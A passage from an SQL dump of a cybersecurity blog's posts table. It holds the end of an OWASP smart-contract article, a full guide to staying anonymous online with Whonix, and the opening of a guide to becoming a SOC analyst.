Crucial</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These vulnerabilities represent the most critical challenges facing smart contract security in 2025. Failing to address them can result in compromised assets, disrupted services, and eroded trust in the blockchain ecosystem.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By focusing on secure development practices, regularly auditing code, and using well-tested libraries, developers can significantly reduce risks.\r\n\r\n</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The OWASP Top 10 for 2025 serves as an essential guide for developers and organizations navigating blockchain advancements. By proactively addressing the vulnerabilities outlined here, blockchain stakeholders can establish safer and more reliable smart contract ecosystems.</p>', '', NULL, NULL, 1, 'draft', '2025-01-22 00:08:49', '2026-01-12 21:41:44', 'Information Security', 'OWASP Top 10 Smart Contract Vulnerabilities for 2025', '', NULL),
(65, 'How to Become Invisible on the Internet with Whonix', 'how-to-become-invisible-on-the-internet-with-whonix', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">As the digital age advances, online privacy is becoming more critical than ever. Cybersecurity threats are rampant, and maintaining a shield of anonymity is no longer a luxury—it\'s a necessity for privacy enthusiasts, cybersecurity professionals, and anyone who values their online security. Enter <b><strong class=\"font-bold\">Whonix</strong></b>—a powerful tool designed to help you stay invisible on the internet.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog will introduce you to Whonix, highlight its capabilities, and provide actionable steps to achieve unparalleled privacy and anonymity online.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is Whonix?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">At its core, <b><strong class=\"font-bold\">Whonix</strong></b> is a privacy-focused operating system built to offer users maximum online anonymity. Unlike traditional operating systems, Whonix runs in a collection of virtual machines and routes all your internet traffic through the Tor network. 
Its two-VM architecture is designed to resist IP leaks from the applications you run, which makes it a robust foundation for protecting your online identity.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you\'re working in cybersecurity, exploring internet privacy, or simply trying to remain invisible online, Whonix provides a solid foundation—though not a guarantee—for keeping your real network identity hidden.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features of Whonix</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s what makes Whonix stand out among other privacy-focused tools and technologies:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Tor Integration</strong></b>: All Workstation traffic is routed through the Tor network by the Gateway, so no application can reach the internet directly.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Isolation in Virtual Machines</strong></b>: Whonix segregates your tasks into two virtual machines—a Whonix-Gateway (which only interacts with Tor) and a Whonix-Workstation (for user applications). The Workstation can only reach the network through the Gateway, so it never learns your real IP address.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Protection Against IP Leaks from Compromised Applications</strong></b>: Because the Workstation has no direct network path and does not know the external address of the host, malware or a malicious script running inside the Workstation cannot reveal your real IP address. This protection does not extend to a compromise of the Gateway, the hypervisor, or the host operating system.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 
[&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Open-Source Transparency</strong></b>: Whonix is entirely open-source, which means anyone can audit its code. That makes hidden backdoors much harder to conceal, but auditability alone does not make it free of vulnerabilities—keep it updated.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why You Need Whonix for Online Privacy</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">1. IP Address Protection</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the biggest giveaways of your online identity is your IP address. Whonix ensures that your actual IP address is not exposed to the websites or services you access online, making it a critical tool for anonymity. Even if a malicious script escapes your browser\'s protections, the Workstation has no route to the internet except through the Gateway, so your IP stays hidden as long as the Gateway and the host are not compromised.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. Resistance to Tracking and Surveillance</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Governments, hackers, and corporations often track or monitor online activity. By using Tor, Whonix makes it far harder for anyone to trace your online activity or build a profile of your behavior. Keep in mind that Tor hides where your traffic comes from, not what you do: logging in to a personal account or repeating identifiable habits can still link a session to you.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. 
Anonymity for High-Security Tasks</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you\'re handling sensitive information or conducting research that demands a high level of privacy, Whonix creates an environment where network-level tracing back to you is far harder—provided you do not reveal identifying information yourself.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">4. Learning Cybersecurity Techniques</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whonix is also a valuable tool for cybersecurity professionals and enthusiasts. It offers a practical way to explore advanced anonymity techniques and test secure configurations.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Set Up Whonix for Maximum Privacy</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Follow these steps to set up Whonix and start your journey toward becoming invisible on the internet.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Install Virtualization Software</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whonix operates in virtual machines, so you’ll need to install virtualization software like <b><strong class=\"font-bold\">VirtualBox</strong></b> or <b><strong class=\"font-bold\">KVM</strong></b>. These platforms allow you to run Whonix without interfering with your main operating system. Install the hypervisor from its vendor and keep it patched: a vulnerability in the hypervisor or the host undermines the isolation Whonix relies on.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. 
Download Whonix</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Visit the <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://www.whonix.org/\">official Whonix website</a> and download the appropriate files for your system. Whonix is divided into two images: <b><strong class=\"font-bold\">Whonix-Gateway</strong></b> and <b><strong class=\"font-bold\">Whonix-Workstation</strong></b>. The Gateway handles all the Tor network interactions, while the Workstation is where you interact with applications. Before importing anything, verify the downloaded images against the signatures (or at least the checksums) the project publishes; a tampered image would undermine every protection described here.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Configure Your Virtual Machines</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Import the downloaded Whonix images into your virtualization software. Allocate sufficient resources (RAM and CPU) for both the Gateway and Workstation. Once set up, start the Gateway first and let it finish connecting to Tor before starting the Workstation. Do not attach any network adapter to the Workstation other than the internal one leading to the Gateway—any other adapter gives applications a path around Tor.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. 
Secure Your Environment</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Update Whonix, the hypervisor, and the host operating system regularly; an unpatched host or hypervisor undermines the isolation Whonix depends on.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use Tor Browser inside the Workstation and keep its settings at the defaults or stricter—custom settings and resized windows make your browser fingerprint stand out.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Avoid installing unnecessary software or plugins that could compromise your security.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Test for IP Leaks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once your setup is complete, use online tools like <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://ipleak.net\">IPLeak.net</a> from inside the Workstation to confirm that the reported IP address and DNS servers belong to Tor exit relays rather than to your ISP. Repeat the check after any change to the VM network settings.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. 
Stay Anonymized</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Never mix your personal identity with your activities within Whonix—do not log in to personal accounts from the Workstation.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Avoid sharing personal information online.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Use end-to-end encrypted communication tools to maintain privacy.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Staying Invisible Online</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While Whonix is a powerful tool, maintaining online anonymity requires a combination of best practices and secure behavior.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Use Strong, Unique Passwords</strong></b>: Use a long, unique password or passphrase for every account, ideally generated and stored by a password manager. Length and uniqueness matter more than forced character mixes, and a password reused between a pseudonymous account and a personal one links the two identities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Avoid Using Your Real Name</strong></b>: Create pseudonyms and temporary email addresses for online interactions, and do not reuse a pseudonym across unrelated identities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 
[&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Layer Your Privacy Tools Carefully</strong></b>: Encrypted communication tools complement Whonix well. Adding a VPN before or after Tor is not a simple upgrade, however—it shifts trust to the VPN provider and can make your traffic more distinctive—so only do it if you understand the trade-offs for your threat model.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Beware of Metadata</strong></b>: Files like images and documents contain metadata that may reveal your identity—strip metadata before sharing.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Challenges and Limitations of Using Whonix</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While Whonix is a game-changer, it\'s important to keep its limitations in mind.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Slower Speeds</strong></b>: Routing traffic through Tor can slow down your connection speeds compared to regular browsing.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Learning Curve</strong></b>: Beginners may take a bit of time to fully understand and configure Whonix.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Not Foolproof</strong></b>: Human error, like revealing personal details or bypassing isolation protocols, can compromise your anonymity. So can a browser exploit, a compromised host, or an adversary able to observe traffic at both ends of the Tor circuit—Whonix narrows the attack surface but does not remove it.</li>\r\n</ul>\r\n<h2 class=\"font-bold 
text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Becoming Invisible Online with Whonix</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whonix empowers individuals and organizations to stay anonymous and protect sensitive data in an increasingly surveilled digital world. Whether you\'re a privacy enthusiast or a cybersecurity learner, integrating Whonix into your online routine is a definitive step toward becoming invisible on the internet.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">But remember, tools like Whonix are only part of the solution. Online privacy demands vigilance, education, and a commitment to secure practices.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Are you ready to take charge of your anonymity? Start your Whonix adventure today—because in the race for online privacy, protecting yourself isn’t optional; it’s essential.</p>', '', NULL, NULL, 1, 'draft', '2025-01-21 21:56:41', '2026-01-12 21:41:44', 'Information Security', 'How to Become Invisible on the Internet with Whonix', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(66, 'How to Become a SOC Analyst in 2025', 'how-to-become-a-soc-analyst-in-2025', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you\'re passionate about cybersecurity and eager to start an impactful career, becoming a Security Operations Center (SOC) Analyst might just be the perfect path for you. As the frequency and sophistication of cybersecurity threats continue to rise, businesses across the globe are looking for skilled professionals to protect their systems and data. SOC Analysts are on the frontlines of this battle, making it a rewarding and in-demand career choice.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This comprehensive guide provides all the details you need to map out your path to becoming a SOC Analyst, including key steps, essential skills, and practical tips that help you stand out in this sought-after field.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is a SOC Analyst?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A SOC Analyst plays the crucial role of monitoring, analyzing, and responding to security incidents within an organization’s network and systems. 
Acting as the first line of defense, SOC Analysts ensure that potential data breaches, malware infections, or other cyber risks are identified and addressed swiftly to protect the company from harm.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Key responsibilities typically include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Monitoring security tools like SIEMs (Security Information and Event Management) to detect threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Performing in-depth analysis of security alerts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Responding to and escalating incidents as necessary.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Conducting security investigations and providing actionable insights.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Pursue a Career as a SOC Analyst?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">There are several reasons why pursuing a career as a SOC Analyst is a smart move in 2025:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong 
class=\"font-bold\">High Demand</strong></b>: The need for cybersecurity experts has never been greater. SOC Analysts play a critical role in safeguarding sensitive information, making them indispensable in every industry.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Competitive Salaries</strong></b>: SOC Analyst positions offer attractive salaries, with room for growth as you gain experience and expertise.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Rewarding Work</strong></b>: Protecting organizations from threats and knowing your work makes a tangible difference creates immense job satisfaction.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Career Growth</strong></b>: The role of SOC Analyst is often a stepping stone to advanced positions in cybersecurity, such as SOC Manager, Penetration Tester, or Security Architect.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">10 Steps to Becoming a SOC Analyst</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 1: Build a Strong IT Foundation</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before you can tackle cybersecurity, it\'s essential to have a solid understanding of Information Technology (IT). 
Core areas to focus on include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Hardware and software basics</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Networking fundamentals</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Operating systems (Windows, Linux, etc.)</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Resources to kick-start your learning</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Paid</strong></b>: CBT Nuggets’ A+ Certification courses</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Free</strong></b>:\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Google’s IT Support Certification</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Professor Messer’s IT videos on YouTube</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] 
[&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">TCM Security’s free \"Practical Help Desk\" course</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Additionally, hands-on experience is invaluable. Set up a home lab using affordable hardware, and help friends or family troubleshoot basic tech issues. These real-world exercises will sharpen your problem-solving abilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 2: Learn Networking</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Networking is the backbone of cybersecurity. A SOC Analyst must deeply understand how data flows through networks, how protocols operate, and how to analyze network traffic.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Resources to learn networking</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Paid Options</strong></b>:\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">CBT Nuggets’ Network+ or CCNA classes</li>\r\n</ul>\r\n</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Free</strong></b>:\r\n<ul class=\"pt-[9px] pb-[2px] 
pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Google IT Support course (networking modules)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Professor Messer’s Network+ series on YouTube</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Cisco’s Networking Tutorials</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Activities like creating home network diagrams or using tools such as Packet Tracer and GNS3 for network simulations will strengthen your practical skills.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 3: Build Your Cybersecurity Knowledge</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once you’ve mastered IT and networking, it’s time to explore cybersecurity fundamentals. 
